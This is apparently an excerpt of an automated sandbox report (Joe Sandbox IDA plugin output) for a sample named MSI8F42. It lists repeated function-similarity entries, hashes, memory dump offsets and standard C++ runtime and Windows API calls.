                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 2478367bee76ea70619d581dfd9ba98298fa8894ad2997e652aeb2b4aa3dc0a9
                                                                                                                                            • Instruction ID: 14256a0935a975625645b74e5ed6ca53e0d0b23be3ba73d0056414ed41111c20
                                                                                                                                            • Opcode Fuzzy Hash: 2478367bee76ea70619d581dfd9ba98298fa8894ad2997e652aeb2b4aa3dc0a9
                                                                                                                                            • Instruction Fuzzy Hash: 8A01C435901119DBCB0BEB60C855BBEB774BF44710F25090AE814AF2D2CF709E018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD759
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD763
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD7B4
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD7D4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 82743eb4580f82140ba180b219dd8db2d11f889f1599618f261f1255647797aa
                                                                                                                                            • Instruction ID: 5dfd41ec60a5f2b97a6369e974764ab2b1219d44be3acb0f25aba08a54e2a90f
                                                                                                                                            • Opcode Fuzzy Hash: 82743eb4580f82140ba180b219dd8db2d11f889f1599618f261f1255647797aa
                                                                                                                                            • Instruction Fuzzy Hash: 7501C03691011E9BCB0AFF60C851ABEFBA6AF84750F240819EA116F2D1CF709E01CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003027A9
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003027B3
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302804
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302824
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 6d9026ca5f82aba6c50a2db10d714cfed5c5f5a64f0871c3e0f9f440364e9637
                                                                                                                                            • Instruction ID: 6675d57111599bfe36af3d33ec797f4ce4af0b08828251b4a8e198641f5f0b07
                                                                                                                                            • Opcode Fuzzy Hash: 6d9026ca5f82aba6c50a2db10d714cfed5c5f5a64f0871c3e0f9f440364e9637
                                                                                                                                            • Instruction Fuzzy Hash: 8B01C4399012199BCB1BEB64C865ABEB774BF84710F250409E904AF2D2CF309E05CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD7EE
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD7F8
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD849
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD869
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 241da7bf13a4a3acfd3532387b2fa91dc477b77d7e3d2e038a55e0a9afbbfc55
                                                                                                                                            • Instruction ID: 47c6cc6d5df4d3e421ef15ab20d37f54b015b1ea09d22670f10423bd7e1368c7
                                                                                                                                            • Opcode Fuzzy Hash: 241da7bf13a4a3acfd3532387b2fa91dc477b77d7e3d2e038a55e0a9afbbfc55
                                                                                                                                            • Instruction Fuzzy Hash: 5E01C43591011D9BCB1AFF60D8527BEBBA5AF44790F240419E5016F2D1CF749E428F91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030283E
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302848
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302899
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003028B9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 6e737379b0e03c02e01f2f3d146d3d8607ee902dd84f1cbc8f839999a1236bd4
                                                                                                                                            • Instruction ID: 4531b24e287c44478619e57ac6307738fbddd793a716388e00aa202c4c299eea
                                                                                                                                            • Opcode Fuzzy Hash: 6e737379b0e03c02e01f2f3d146d3d8607ee902dd84f1cbc8f839999a1236bd4
                                                                                                                                            • Instruction Fuzzy Hash: 3101D639901129DBCB1BEB64C855BBEB7B5BF84710F254919F410AF2D2DF309E018B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003028D3
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003028DD
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030292E
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030294E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: 2ae9df42ba0b348525f055ddc0dd79c732c6eccce2b2447c8ac1e009e22dd5b1
                                                                                                                                            • Instruction ID: 8251bbf8f281e121ed36bcc5710a058a330c44ece8e536669d29f8b76e195096
                                                                                                                                            • Opcode Fuzzy Hash: 2ae9df42ba0b348525f055ddc0dd79c732c6eccce2b2447c8ac1e009e22dd5b1
                                                                                                                                            • Instruction Fuzzy Hash: A0019235902219DBCB1BEB64D865ABEB7B5AF84720F250909F510AF2D1CF709E418B91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030E974
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030E97E
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030E9CF
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030E9EF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            • Opcode ID: e4499255ad7555688781400432d8f98d2018425665a9ad3b269aa892baf86aa6
                                                                                                                                            • Instruction ID: 7869fe7c456c77d07744e8aed4f460e17d535030d92cffe792c71851cc55071c
                                                                                                                                            • Opcode Fuzzy Hash: e4499255ad7555688781400432d8f98d2018425665a9ad3b269aa892baf86aa6
                                                                                                                                            • Instruction Fuzzy Hash: C2018035A021199BCB1BEB64D862BBEB7A5BF84710F250909F510AF3D2CF749E41CB91
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EA09
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EA13
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EA64
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EA84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302BBC
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302BC6
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302C17
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302C37
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EBC8
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EBD2
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EC23
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EC43
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EC5D
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EC67
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030ECB8
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030ECD8
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302C51
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302C5B
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302CAC
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302CCC
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302CE6
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302CF0
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302D41
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302D61
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302E10
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302E1A
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302E6B
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302E8B
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302EA5
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302EAF
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302F00
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302F20
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302F3A
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302F44
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302F95
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302FB5
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2854358121-1316489359
                                                                                                                                            APIs
                                                                                                                                            • SleepConditionVariableCS.KERNELBASE(?,00312CBD,00000064), ref: 00312D43
                                                                                                                                            • LeaveCriticalSection.KERNEL32(0034DD3C,?,?,00312CBD,00000064,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312D4D
                                                                                                                                            • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00312CBD,00000064,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312D5E
                                                                                                                                            • EnterCriticalSection.KERNEL32(0034DD3C,?,00312CBD,00000064,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312D65
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3269011525-1316489359
                                                                                                                                            APIs
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00326E40
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00326F01
                                                                                                                                            • __freea.LIBCMT ref: 00326F68
                                                                                                                                              • Part of subcall function 00325BDC: HeapAlloc.KERNEL32(00000000,00000000,A82,?,0032543A,?,00000000,?,00316CE7,00000000,A82,00000000,?,?,?,0032363B), ref: 00325C0E
                                                                                                                                            • __freea.LIBCMT ref: 00326F7D
                                                                                                                                            • __freea.LIBCMT ref: 00326F8D
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1096550386-0
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB8DD
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB900
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB928
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FB98D
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB9B7
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 459529453-0
                                                                                                                                            APIs
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2020259771-0
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 002FEC8E
                                                                                                                                              • Part of subcall function 002FD87C: __EH_prolog3.LIBCMT ref: 002FD883
                                                                                                                                              • Part of subcall function 002FD87C: std::_Lockit::_Lockit.LIBCPMT ref: 002FD88D
                                                                                                                                              • Part of subcall function 002FD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 002FD8FE
                                                                                                                                            • _Find_elem.LIBCPMT ref: 002FEE8A
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21$0123456789ABCDEFabcdef-+Xx
                                                                                                                                            • API String ID: 2544715827-778032925
                                                                                                                                            • Opcode ID: 7251b7f5640d11e8537074a8e3efe0dfe472491408bdb05b9a44a1fbd188a250
                                                                                                                                            • Instruction ID: e3594b928e241e226f4074771e5b74b5e3df3c896cc950e88860d541b41e0205
                                                                                                                                            • Opcode Fuzzy Hash: 7251b7f5640d11e8537074a8e3efe0dfe472491408bdb05b9a44a1fbd188a250
                                                                                                                                            • Instruction Fuzzy Hash: 5BC1AF30E2428D8ADF26DFA4C550BFCFBB6AF45380F264179E9856B2A3C7209D55CB11
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 003062C8
                                                                                                                                              • Part of subcall function 00302D74: __EH_prolog3.LIBCMT ref: 00302D7B
                                                                                                                                              • Part of subcall function 00302D74: std::_Lockit::_Lockit.LIBCPMT ref: 00302D85
                                                                                                                                              • Part of subcall function 00302D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00302DF6
                                                                                                                                            • _Find_elem.LIBCPMT ref: 00306502
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                            • String ID: 21$0123456789ABCDEFabcdef-+Xx
                                                                                                                                            • API String ID: 2544715827-778032925
                                                                                                                                            • Opcode ID: 9d454d8fe9c1328ec719f50e6ae09d7c225e4071555765a5d01f5872e8c91b2a
                                                                                                                                            • Instruction ID: fc9b6fb57ccda8da72a318e08cf8bd0c11152c5cdb40b7e8ce6f82532f5b8fbf
                                                                                                                                            • Opcode Fuzzy Hash: 9d454d8fe9c1328ec719f50e6ae09d7c225e4071555765a5d01f5872e8c91b2a
                                                                                                                                            • Instruction Fuzzy Hash: D7C1B430E062688BDF26DF64C8627ADBBB1BF51304F454099E885AB2CBDB348D95CB50
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0030669E
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 002FB8DD
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::_Lockit.LIBCPMT ref: 002FB900
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 002FB928
                                                                                                                                              • Part of subcall function 002FB8B0: std::_Lockit::~_Lockit.LIBCPMT ref: 002FB9B7
                                                                                                                                            • _Find_elem.LIBCPMT ref: 003068D8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                            • String ID: 21$0123456789ABCDEFabcdef-+Xx
                                                                                                                                            • API String ID: 3042121994-778032925
                                                                                                                                            • Opcode ID: 0116d987eb4d82226a80dced5cbc3c229072ed591c58dbb78bfbe09bd2def5df
                                                                                                                                            • Instruction ID: 42afd0f9a48cece718c0f4e5127f1d65f746191c76433b08d0ce27ff42113793
                                                                                                                                            • Opcode Fuzzy Hash: 0116d987eb4d82226a80dced5cbc3c229072ed591c58dbb78bfbe09bd2def5df
                                                                                                                                            • Instruction Fuzzy Hash: A2C1C670E062588FDF26DF64C8627BDBBB2BF41304F558099D885AB2CADB348D95CB50
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018,7642E7B1,?,00000000), ref: 002FBBA3
                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 002FBD7F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
